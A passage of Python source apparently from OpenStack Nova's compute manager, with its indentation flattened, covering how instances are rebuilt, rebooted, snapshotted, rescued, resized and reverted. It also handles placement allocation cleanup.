LOG.debug("Could not rebuild instance on this host, not "
"enough resources available.", instance=instance)
else:
# RescheduledException is raised by the late server group
# policy check during evacuation if a parallel scheduling
# violated the policy.
# We catch the RescheduledException here but we don't have
# the plumbing to do an actual reschedule so we abort the
# operation.
LOG.debug("Could not rebuild instance on this host, "
"late server group check failed.",
instance=instance)
# NOTE(ndipanov): We just abort the build for now and leave a
# migration record for potential cleanup later
self._set_migration_status(migration, 'failed')
# Since the claim failed, we need to remove the allocation
# created against the destination node. Note that we can only
# get here when evacuating to a destination node. Rebuilding
# on the same host (not evacuate) uses the NopClaim which will
# not raise ComputeResourcesUnavailable.
rt.delete_allocation_for_evacuated_instance(
context, instance, scheduled_node, node_type='destination')
self._notify_instance_rebuild_error(context, instance, e, bdms)
raise exception.BuildAbortException(
instance_uuid=instance.uuid, reason=e.format_message())
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
LOG.debug('Instance was deleted while rebuilding',
instance=instance)
self._set_migration_status(migration, 'failed')
self._notify_instance_rebuild_error(context, instance, e, bdms)
except Exception as e:
self._set_migration_status(migration, 'failed')
if recreate or scheduled_node is not None:
rt.delete_allocation_for_evacuated_instance(
context, instance, scheduled_node,
node_type='destination')
self._notify_instance_rebuild_error(context, instance, e, bdms)
raise
else:
instance.apply_migration_context()
# NOTE (ndipanov): This save will now update the host and node
# attributes making sure that next RT pass is consistent since
# it will be based on the instance and not the migration DB
# entry.
instance.host = self.host
instance.node = scheduled_node
instance.save()
instance.drop_migration_context()
# NOTE (ndipanov): Mark the migration as done only after we
# mark the instance as belonging to this host.
self._set_migration_status(migration, 'done')
def _do_rebuild_instance_with_claim(self, claim_context, *args, **kwargs):
"""Helper to avoid deep nesting in the top-level method."""
with claim_context:
self._do_rebuild_instance(*args, **kwargs)
@staticmethod
def _get_image_name(image_meta):
if image_meta.obj_attr_is_set("name"):
return image_meta.name
else:
return ''
def _do_rebuild_instance(self, context, instance, orig_image_ref,
image_ref, injected_files, new_pass,
orig_sys_metadata, bdms, recreate,
on_shared_storage, preserve_ephemeral,
migration, request_spec):
orig_vm_state = instance.vm_state
if recreate:
if request_spec:
# NOTE(gibi): Do a late check of server group policy as
# parallel scheduling could violate such policy. This will
# cause the evacuate to fail as rebuild does not implement
# reschedule.
hints = self._get_scheduler_hints({}, request_spec)
self._validate_instance_group_policy(context, instance, hints)
if not self.driver.capabilities["supports_recreate"]:
raise exception.InstanceRecreateNotSupported
self._check_instance_exists(context, instance)
if on_shared_storage is None:
                LOG.debug('on_shared_storage is not provided, using driver '
                          'information to decide if the instance needs to '
                          'be recreated')
on_shared_storage = self.driver.instance_on_disk(instance)
elif (on_shared_storage !=
self.driver.instance_on_disk(instance)):
# To cover case when admin expects that instance files are
# on shared storage, but not accessible and vice versa
raise exception.InvalidSharedStorage(
_("Invalid state of instance files on shared"
" storage"))
if on_shared_storage:
LOG.info('disk on shared storage, recreating using'
' existing disk')
else:
image_ref = orig_image_ref = instance.image_ref
LOG.info("disk not on shared storage, rebuilding from:"
" '%s'", str(image_ref))
if image_ref:
image_meta = objects.ImageMeta.from_image_ref(
context, self.image_api, image_ref)
else:
image_meta = instance.image_meta
# This instance.exists message should contain the original
# image_ref, not the new one. Since the DB has been updated
# to point to the new one... we have to override it.
orig_image_ref_url = self.image_api.generate_image_url(orig_image_ref,
context)
extra_usage_info = {'image_ref_url': orig_image_ref_url}
compute_utils.notify_usage_exists(
self.notifier, context, instance,
current_period=True, system_metadata=orig_sys_metadata,
extra_usage_info=extra_usage_info)
# This message should contain the new image_ref
extra_usage_info = {'image_name': self._get_image_name(image_meta)}
self._notify_about_instance_usage(context, instance,
"rebuild.start", extra_usage_info=extra_usage_info)
# NOTE: image_name is not included in the versioned notification
# because we already provide the image_uuid in the notification
# payload and the image details can be looked up via the uuid.
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBUILD,
phase=fields.NotificationPhase.START,
bdms=bdms)
instance.power_state = self._get_power_state(context, instance)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[task_states.REBUILDING])
if recreate:
self.network_api.setup_networks_on_host(
context, instance, self.host)
# For nova-network this is needed to move floating IPs
# For neutron this updates the host in the port binding
# TODO(cfriesen): this network_api call and the one above
# are so similar, we should really try to unify them.
self.network_api.setup_instance_network_on_host(
context, instance, self.host, migration)
# TODO(mriedem): Consider decorating setup_instance_network_on_host
# with @base_api.refresh_cache and then we wouldn't need this
# explicit call to get_instance_nw_info.
network_info = self.network_api.get_instance_nw_info(context,
instance)
else:
network_info = instance.get_network_info()
allocations = self.reportclient.get_allocations_for_consumer(
context, instance.uuid)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = \
self._get_instance_block_device_info(
context, instance, bdms=bdms)
def detach_block_devices(context, bdms):
for bdm in bdms:
if bdm.is_volume:
# NOTE (ildikov): Having the attachment_id set in the BDM
# means that it's the new Cinder attach/detach flow
# (available from v3.44). In that case we explicitly
# attach and detach the volumes through attachment level
# operations. In this scenario _detach_volume will delete
# the existing attachment which would make the volume
# status change to 'available' if we don't pre-create
# another empty attachment before deleting the old one.
attachment_id = None
if bdm.attachment_id:
attachment_id = self.volume_api.attachment_create(
context, bdm['volume_id'], instance.uuid)['id']
self._detach_volume(context, bdm, instance,
destroy_bdm=False)
if attachment_id:
bdm.attachment_id = attachment_id
bdm.save()
files = self._decode_files(injected_files)
kwargs = dict(
context=context,
instance=instance,
image_meta=image_meta,
injected_files=files,
admin_password=new_pass,
allocations=allocations,
bdms=bdms,
detach_block_devices=detach_block_devices,
attach_block_devices=self._prep_block_device,
block_device_info=block_device_info,
network_info=network_info,
preserve_ephemeral=preserve_ephemeral,
recreate=recreate)
try:
with instance.mutated_migration_context():
self.driver.rebuild(**kwargs)
except NotImplementedError:
# NOTE(rpodolyaka): driver doesn't provide specialized version
# of rebuild, fall back to the default implementation
self._rebuild_default_impl(**kwargs)
self._update_instance_after_spawn(context, instance)
instance.save(expected_task_state=[task_states.REBUILD_SPAWNING])
if orig_vm_state == vm_states.STOPPED:
LOG.info("bringing vm to original state: '%s'",
orig_vm_state, instance=instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = task_states.POWERING_OFF
instance.progress = 0
instance.save()
self.stop_instance(context, instance, False)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "rebuild.end",
network_info=network_info,
extra_usage_info=extra_usage_info)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBUILD,
phase=fields.NotificationPhase.END,
bdms=bdms)
def _handle_bad_volumes_detached(self, context, instance, bad_devices,
block_device_info):
"""Handle cases where the virt-layer had to detach non-working volumes
in order to complete an operation.
"""
for bdm in block_device_info['block_device_mapping']:
if bdm.get('mount_device') in bad_devices:
try:
volume_id = bdm['connection_info']['data']['volume_id']
except KeyError:
continue
# NOTE(sirp): ideally we'd just call
# `compute_api.detach_volume` here but since that hits the
# DB directly, that's off limits from within the
# compute-manager.
#
# API-detach
LOG.info("Detaching from volume api: %s", volume_id)
self.volume_api.begin_detaching(context, volume_id)
# Manager-detach
self.detach_volume(context, volume_id, instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def reboot_instance(self, context, instance, block_device_info,
reboot_type):
"""Reboot an instance on this host."""
# acknowledge the request made it to the manager
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_PENDING
expected_states = task_states.soft_reboot_states
else:
instance.task_state = task_states.REBOOT_PENDING_HARD
expected_states = task_states.hard_reboot_states
context = context.elevated()
LOG.info("Rebooting instance", instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance, "reboot.start")
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBOOT,
phase=fields.NotificationPhase.START,
bdms=bdms
)
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=expected_states)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning('trying to reboot a non-running instance:'
' (state: %(state)s expected: %(running)s)',
{'state': state, 'running': running},
instance=instance)
def bad_volumes_callback(bad_devices):
self._handle_bad_volumes_detached(
context, instance, bad_devices, block_device_info)
try:
# Don't change it out of rescue mode
if instance.vm_state == vm_states.RESCUED:
new_vm_state = vm_states.RESCUED
else:
new_vm_state = vm_states.ACTIVE
new_power_state = None
if reboot_type == "SOFT":
instance.task_state = task_states.REBOOT_STARTED
expected_state = task_states.REBOOT_PENDING
else:
instance.task_state = task_states.REBOOT_STARTED_HARD
expected_state = task_states.REBOOT_PENDING_HARD
instance.save(expected_task_state=expected_state)
self.driver.reboot(context, instance,
network_info,
reboot_type,
block_device_info=block_device_info,
bad_volumes_callback=bad_volumes_callback)
except Exception as error:
with excutils.save_and_reraise_exception() as ctxt:
exc_info = sys.exc_info()
# if the reboot failed but the VM is running don't
# put it into an error state
new_power_state = self._get_power_state(context, instance)
if new_power_state == power_state.RUNNING:
LOG.warning('Reboot failed but instance is running',
instance=instance)
compute_utils.add_instance_fault_from_exc(context,
instance, error, exc_info)
self._notify_about_instance_usage(context, instance,
'reboot.error', fault=error)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBOOT,
phase=fields.NotificationPhase.ERROR,
exception=error, bdms=bdms
)
ctxt.reraise = False
else:
LOG.error('Cannot reboot instance: %s', error,
instance=instance)
self._set_instance_obj_error_state(context, instance)
if not new_power_state:
new_power_state = self._get_power_state(context, instance)
try:
instance.power_state = new_power_state
instance.vm_state = new_vm_state
instance.task_state = None
instance.save()
except exception.InstanceNotFound:
LOG.warning("Instance disappeared during reboot",
instance=instance)
self._notify_about_instance_usage(context, instance, "reboot.end")
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBOOT,
phase=fields.NotificationPhase.END,
bdms=bdms
)
@delete_image_on_error
def _do_snapshot_instance(self, context, image_id, instance):
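        # Backups reuse the snapshot code path but run under the IMAGE_BACKUP
        # task state so they can be distinguished from user-initiated
        # snapshots.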
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_BACKUP)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def backup_instance(self, context, image_id, instance, backup_type,
rotation):
"""Backup an instance on this host.
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around
"""
self._do_snapshot_instance(context, image_id, instance)
self._rotate_backups(context, instance, backup_type, rotation)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
@delete_image_on_error
def snapshot_instance(self, context, image_id, instance):
"""Snapshot an instance on this host.
:param context: security context
:param image_id: glance.db.sqlalchemy.models.Image.Id
:param instance: a nova.objects.instance.Instance object
"""
        # NOTE(dave-mcnally) the task state will already be set by the api,
        # but if the compute manager has crashed or been restarted prior to
        # the request getting here, the task state may have been cleared, so
        # we set it again and things continue normally
try:
instance.task_state = task_states.IMAGE_SNAPSHOT
instance.save(
expected_task_state=task_states.IMAGE_SNAPSHOT_PENDING)
except exception.InstanceNotFound:
# possibility instance no longer exists, no point in continuing
LOG.debug("Instance not found, could not set state %s "
"for instance.",
task_states.IMAGE_SNAPSHOT, instance=instance)
return
except exception.UnexpectedDeletingTaskStateError:
LOG.debug("Instance being deleted, snapshot cannot continue",
instance=instance)
return
self._snapshot_instance(context, image_id, instance,
task_states.IMAGE_SNAPSHOT)
def _snapshot_instance(self, context, image_id, instance,
expected_task_state):
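        # Common implementation for snapshot and backup: record the current
        # power state, drive the virt driver's snapshot() via a task-state
        # update callback, and clean up if the instance or image disappears
        # part-way through.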
context = context.elevated()
instance.power_state = self._get_power_state(context, instance)
try:
instance.save()
LOG.info('instance snapshotting', instance=instance)
if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning('trying to snapshot a non-running instance: '
'(state: %(state)s expected: %(running)s)',
{'state': state, 'running': running},
instance=instance)
self._notify_about_instance_usage(
context, instance, "snapshot.start")
compute_utils.notify_about_instance_snapshot(context, instance,
self.host, phase=fields.NotificationPhase.START,
snapshot_image_id=image_id)
def update_task_state(task_state,
expected_state=expected_task_state):
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self.driver.snapshot(context, instance, image_id,
update_task_state)
instance.task_state = None
instance.save(expected_task_state=task_states.IMAGE_UPLOADING)
self._notify_about_instance_usage(context, instance,
"snapshot.end")
compute_utils.notify_about_instance_snapshot(context, instance,
self.host, phase=fields.NotificationPhase.END,
snapshot_image_id=image_id)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the snapshot
# Quickly bail out of here
msg = 'Instance disappeared during snapshot'
LOG.debug(msg, instance=instance)
try:
image = self.image_api.get(context, image_id)
if image['status'] != 'active':
self.image_api.delete(context, image_id)
except Exception:
LOG.warning("Error while trying to clean up image %s",
image_id, instance=instance)
except exception.ImageNotFound:
instance.task_state = None
instance.save()
LOG.warning("Image not found during snapshot", instance=instance)
def _post_interrupted_snapshot_cleanup(self, context, instance):
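        # Give the virt driver a chance to clean up anything left behind by a
        # snapshot that was interrupted part-way through.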
self.driver.post_interrupted_snapshot_cleanup(context, instance)
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
self.driver.volume_snapshot_create(context, instance, volume_id,
create_info)
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info):
self.driver.volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info)
@wrap_instance_fault
def _rotate_backups(self, context, instance, backup_type, rotation):
"""Delete excess backups associated to an instance.
Instances are allowed a fixed number of backups (the rotation number);
this method deletes the oldest backups that exceed the rotation
threshold.
:param context: security context
:param instance: Instance dict
:param backup_type: a user-defined type, like "daily" or "weekly" etc.
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
"""
filters = {'property-image_type': 'backup',
'property-backup_type': backup_type,
'property-instance_uuid': instance.uuid}
images = self.image_api.get_all(context, filters=filters,
sort_key='created_at', sort_dir='desc')
num_images = len(images)
LOG.debug("Found %(num_images)d images (rotation: %(rotation)d)",
{'num_images': num_images, 'rotation': rotation},
instance=instance)
if num_images > rotation:
# NOTE(sirp): this deletes all backups that exceed the rotation
# limit
excess = len(images) - rotation
LOG.debug("Rotating out %d backups", excess,
instance=instance)
for i in range(excess):
image = images.pop()
image_id = image['id']
LOG.debug("Deleting image %s", image_id,
instance=instance)
try:
self.image_api.delete(context, image_id)
except exception.ImageNotFound:
LOG.info("Failed to find image %(image_id)s to "
"delete", {'image_id': image_id},
instance=instance)
except (exception.ImageDeleteConflict, Exception) as exc:
LOG.info("Failed to delete image %(image_id)s during "
"deleting excess backups. "
"Continuing for next image.. %(exc)s",
{'image_id': image_id, 'exc': exc},
instance=instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def set_admin_password(self, context, instance, new_pass):
"""Set the root/admin password for an instance on this host.
This is generally only called by API password resets after an
image has been built.
@param context: Nova auth context.
@param instance: Nova instance object.
@param new_pass: The admin password for the instance.
"""
context = context.elevated()
if new_pass is None:
# Generate a random password
new_pass = utils.generate_password()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
instance.task_state = None
instance.save(expected_task_state=task_states.UPDATING_PASSWORD)
_msg = _('instance %s is not running') % instance.uuid
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
try:
self.driver.set_admin_password(instance, new_pass)
LOG.info("Admin password set", instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except exception.InstanceAgentNotEnabled:
with excutils.save_and_reraise_exception():
LOG.debug('Guest agent is not enabled for the instance.',
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except exception.SetAdminPasswdNotSupported:
with excutils.save_and_reraise_exception():
LOG.info('set_admin_password is not supported '
'by this driver or guest instance.',
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except NotImplementedError:
LOG.warning('set_admin_password is not implemented '
'by this driver or guest instance.',
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
raise NotImplementedError(_('set_admin_password is not '
'implemented by this driver or guest '
'instance.'))
except exception.UnexpectedTaskStateError:
# interrupted by another (most likely delete) task
# do not retry
raise
except Exception:
# Catch all here because this could be anything.
LOG.exception('set_admin_password failed', instance=instance)
self._set_instance_obj_error_state(context, instance)
# We create a new exception here so that we won't
# potentially reveal password information to the
# API caller. The real exception is logged above
_msg = _('error setting admin password')
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def inject_file(self, context, path, file_contents, instance):
"""Write a file to the specified path in an instance on this host."""
# NOTE(russellb) Remove this method, as well as the underlying virt
# driver methods, when the compute rpc interface is bumped to 4.x
# as it is no longer used.
context = context.elevated()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
LOG.warning('trying to inject a file into a non-running '
'(state: %(current_state)s expected: '
'%(expected_state)s)',
{'current_state': current_power_state,
'expected_state': expected_state},
instance=instance)
LOG.info('injecting file to %s', path, instance=instance)
self.driver.inject_file(instance, path, file_contents)
def _get_rescue_image(self, context, instance, rescue_image_ref=None):
"""Determine what image should be used to boot the rescue VM."""
# 1. If rescue_image_ref is passed in, use that for rescue.
# 2. Else, use the base image associated with instance's current image.
# The idea here is to provide the customer with a rescue
# environment which they are familiar with.
# So, if they built their instance off of a Debian image,
# their rescue VM will also be Debian.
# 3. As a last resort, use instance's current image.
if not rescue_image_ref:
system_meta = utils.instance_sys_meta(instance)
rescue_image_ref = system_meta.get('image_base_image_ref')
if not rescue_image_ref:
LOG.warning('Unable to find a different image to use for '
'rescue VM, using instance\'s current image',
instance=instance)
rescue_image_ref = instance.image_ref
return objects.ImageMeta.from_image_ref(
context, self.image_api, rescue_image_ref)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def rescue_instance(self, context, instance, rescue_password,
rescue_image_ref, clean_shutdown):
context = context.elevated()
LOG.info('Rescuing', instance=instance)
admin_password = (rescue_password if rescue_password else
utils.generate_password())
network_info = self.network_api.get_instance_nw_info(context, instance)
rescue_image_meta = self._get_rescue_image(context, instance,
rescue_image_ref)
extra_usage_info = {'rescue_image_name':
self._get_image_name(rescue_image_meta)}
self._notify_about_instance_usage(context, instance,
"rescue.start", extra_usage_info=extra_usage_info,
network_info=network_info)
compute_utils.notify_about_instance_rescue_action(
context, instance, self.host, rescue_image_ref,
action=fields.NotificationAction.RESCUE,
phase=fields.NotificationPhase.START)
try:
self._power_off_instance(context, instance, clean_shutdown)
self.driver.rescue(context, instance,
network_info,
rescue_image_meta, admin_password)
except Exception as e:
LOG.exception("Error trying to Rescue Instance",
instance=instance)
self._set_instance_obj_error_state(context, instance)
raise exception.InstanceNotRescuable(
instance_id=instance.uuid,
reason=_("Driver Error: %s") % e)
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
instance.vm_state = vm_states.RESCUED
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESCUING)
self._notify_about_instance_usage(context, instance,
"rescue.end", extra_usage_info=extra_usage_info,
network_info=network_info)
compute_utils.notify_about_instance_rescue_action(
context, instance, self.host, rescue_image_ref,
action=fields.NotificationAction.RESCUE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def unrescue_instance(self, context, instance):
context = context.elevated()
LOG.info('Unrescuing', instance=instance)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance,
"unrescue.start", network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNRESCUE,
phase=fields.NotificationPhase.START)
with self._error_out_instance_on_exception(context, instance):
self.driver.unrescue(instance,
network_info)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=task_states.UNRESCUING)
self._notify_about_instance_usage(context,
instance,
"unrescue.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.UNRESCUE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@wrap_instance_fault
def change_instance_metadata(self, context, diff, instance):
"""Update the metadata published to the instance."""
LOG.debug("Changing instance metadata according to %r",
diff, instance=instance)
self.driver.change_instance_metadata(context, instance, diff)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def confirm_resize(self, context, instance, migration):
"""Confirms a migration/resize and deletes the 'old' instance.
This is called from the API and runs on the source host.
Nothing needs to happen on the destination host at this point since
the instance is already running there. This routine just cleans up the
source host.
"""
@utils.synchronized(instance.uuid)
def do_confirm_resize(context, instance, migration_id):
# NOTE(wangpan): Get the migration status from db, if it has been
# confirmed, we do nothing and return here
LOG.debug("Going to confirm migration %s", migration_id,
instance=instance)
try:
# TODO(russellb) Why are we sending the migration object just
# to turn around and look it up from the db again?
migration = objects.Migration.get_by_id(
context.elevated(), migration_id)
except exception.MigrationNotFound:
LOG.error("Migration %s is not found during confirmation",
migration_id, instance=instance)
return
if migration.status == 'confirmed':
LOG.info("Migration %s is already confirmed",
migration_id, instance=instance)
return
elif migration.status not in ('finished', 'confirming'):
LOG.warning("Unexpected confirmation status '%(status)s' "
"of migration %(id)s, exit confirmation process",
{"status": migration.status, "id": migration_id},
instance=instance)
return
# NOTE(wangpan): Get the instance from db, if it has been
# deleted, we do nothing and return here
expected_attrs = ['metadata', 'system_metadata', 'flavor']
try:
instance = objects.Instance.get_by_uuid(
context, instance.uuid,
expected_attrs=expected_attrs)
except exception.InstanceNotFound:
LOG.info("Instance is not found during confirmation",
instance=instance)
return
self._confirm_resize(context, instance, migration=migration)
do_confirm_resize(context, instance, migration.id)
def _confirm_resize(self, context, instance, migration=None):
"""Destroys the source instance."""
self._notify_about_instance_usage(context, instance,
"resize.confirm.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_CONFIRM,
phase=fields.NotificationPhase.START)
with self._error_out_instance_on_exception(context, instance):
# NOTE(danms): delete stashed migration information
old_instance_type = instance.old_flavor
instance.old_flavor = None
instance.new_flavor = None
instance.system_metadata.pop('old_vm_state', None)
instance.save()
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute, teardown=True)
network_info = self.network_api.get_instance_nw_info(context,
instance)
# TODO(mriedem): Get BDMs here and pass them to the driver.
self.driver.confirm_migration(context, migration, instance,
network_info)
migration.status = 'confirmed'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker()
rt.drop_move_claim(context, instance, migration.source_node,
old_instance_type, prefix='old_')
self._delete_allocation_after_move(context, instance, migration,
old_instance_type,
migration.source_node)
instance.drop_migration_context()
# NOTE(mriedem): The old_vm_state could be STOPPED but the user
# might have manually powered up the instance to confirm the
# resize/migrate, so we need to check the current power state
# on the instance and set the vm_state appropriately. We default
# to ACTIVE because if the power state is not SHUTDOWN, we
# assume _sync_instance_power_state will clean it up.
p_state = instance.power_state
vm_state = None
if p_state == power_state.SHUTDOWN:
vm_state = vm_states.STOPPED
LOG.debug("Resized/migrated instance is powered off. "
"Setting vm_state to '%s'.", vm_state,
instance=instance)
else:
vm_state = vm_states.ACTIVE
instance.vm_state = vm_state
instance.task_state = None
instance.save(expected_task_state=[None, task_states.DELETING,
task_states.SOFT_DELETING])
self._notify_about_instance_usage(
context, instance, "resize.confirm.end",
network_info=network_info)
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_CONFIRM,
phase=fields.NotificationPhase.END)
def _delete_allocation_after_move(self, context, instance, migration,
flavor, nodename):
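        # Clean up the placement allocations held for this move. Depending on
        # whether this is the source or destination node, and whether the
        # migration did migration-based allocation accounting, we either drop
        # the migration-held allocation, leave it for the other side to
        # handle, or fall through to the legacy double-accounting math below.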
rt = self._get_resource_tracker()
cn_uuid = rt.get_node_uuid(nodename)
if migration.source_node == nodename:
if migration.status in ('confirmed', 'completed'):
# NOTE(danms): We're finishing on the source node, so try to
# delete the allocation based on the migration uuid
deleted = self.reportclient.delete_allocation_for_instance(
context, migration.uuid)
if deleted:
LOG.info(_('Source node %(node)s confirmed migration '
'%(mig)s; deleted migration-based '
'allocation'),
{'node': nodename, 'mig': migration.uuid})
# NOTE(danms): We succeeded, which means we do not
# need to do the complex double allocation dance
return
else:
# We're reverting (or failed) on the source, so we
# need to check if our migration holds a claim and if
# so, avoid doing the legacy behavior below.
mig_allocs = (
self.reportclient.get_allocations_for_consumer_by_provider(
context, cn_uuid, migration.uuid))
if mig_allocs:
LOG.info(_('Source node %(node)s reverted migration '
'%(mig)s; not deleting migration-based '
'allocation'),
{'node': nodename, 'mig': migration.uuid})
return
elif migration.dest_node == nodename:
# NOTE(danms): We're reverting on the destination node
# (and we must not be doing a same-host migration if we
# made it past the check above), so we need to check to
# see if the source did migration-based allocation
# accounting
allocs = (
self.reportclient.get_allocations_for_consumer_by_provider(
context, cn_uuid, migration.uuid))
if allocs:
# NOTE(danms): The source did migration-based allocation
# accounting, so we should let the source node rejigger
# the allocations in finish_resize_revert()
LOG.info(_('Destination node %(node)s reverted migration '
'%(mig)s; not deleting migration-based '
'allocation'),
{'node': nodename, 'mig': migration.uuid})
return
# TODO(danms): Remove below this line when we remove compatibility
# for double-accounting migrations (likely rocky)
LOG.info(_('Doing legacy allocation math for migration %(mig)s after '
'instance move'),
{'mig': migration.uuid},
instance=instance)
# NOTE(jaypipes): This sucks, but due to the fact that confirm_resize()
# only runs on the source host and revert_resize() runs on the
# destination host, we need to do this here. Basically, what we're
# doing here is grabbing the existing allocations for this instance
# from the placement API, dropping the resources in the doubled-up
# allocation set that refer to the source host UUID and calling PUT
# /allocations back to the placement API. The allocation that gets
# PUT'd back to placement will only include the destination host and
# any shared providers in the case of a confirm_resize operation and
        # the source host and shared providers for a revert_resize operation.
if not scheduler_utils.remove_allocation_from_compute(
context, instance, cn_uuid, self.reportclient, flavor):
LOG.error("Failed to save manipulated allocation",
instance=instance)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@errors_out_migration
@wrap_instance_fault
def revert_resize(self, context, instance, migration):
"""Destroys the new instance on the destination machine.
Reverts the model changes, and powers on the old instance on the
source machine.
"""
# NOTE(comstud): A revert_resize is essentially a resize back to
# the old size, so we need to send a usage event here.
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
with self._error_out_instance_on_exception(context, instance):
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
teardown=True)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
network_info = self.network_api.get_instance_nw_info(context,
instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
destroy_disks = not self._is_instance_storage_shared(
context, instance, host=migration.source_compute)
self.driver.destroy(context, instance, network_info,
block_device_info, destroy_disks)
self._terminate_volume_connections(context, instance, bdms)
migration.status = 'reverted'
with migration.obj_as_admin():
migration.save()
# NOTE(ndipanov): We need to do this here because dropping the
# claim means we lose the migration_context data. We really should
# fix this by moving the drop_move_claim call to the
# finish_revert_resize method as this is racy (revert is dropped,
# but instance resources will be tracked with the new flavor until
# it gets rolled back in finish_revert_resize, which is
# potentially wrong for a period of time).
instance.revert_migration_context()
instance.save()
rt = self._get_resource_tracker()
rt.drop_move_claim(context, instance, instance.node)
self._delete_allocation_after_move(context, instance, migration,
instance.flavor,
instance.node)
# RPC cast back to the source host to finish the revert there.
self.compute_rpcapi.finish_revert_resize(context, instance,
migration, migration.source_compute)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@errors_out_migration
@wrap_instance_fault
def finish_revert_resize(self, context, instance, migration):
"""Finishes the second half of reverting a resize on the source host.
Bring the original source instance state back (active/shutoff) and
revert the resized attributes in the database.
"""
with self._error_out_instance_on_exception(context, instance):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._notify_about_instance_usage(
context, instance, "resize.revert.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESIZE_REVERT,
phase=fields.NotificationPhase.START, bdms=bdms)
# NOTE(mriedem): delete stashed old_vm_state information; we
# default to ACTIVE for backwards compatibility if old_vm_state
# is not set
old_vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
self._set_instance_info(instance, instance.old_flavor)
instance.old_flavor = None
instance.new_flavor = None
instance.host = migration.source_compute
instance.node = migration.source_node
instance.save()
self._revert_allocation(context, instance, migration)
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute)
migration_p = obj_base.obj_to_primitive(migration)
# NOTE(hanrong): we need to change migration_p['dest_compute'] to
# source host temporarily. "network_api.migrate_instance_finish"
# will setup the network for the instance on the destination host.
            # For revert resize, the instance goes back to the source host, so
            # the setup of the network for the instance should be done on the
            # source host. So set migration_p['dest_compute'] to the source
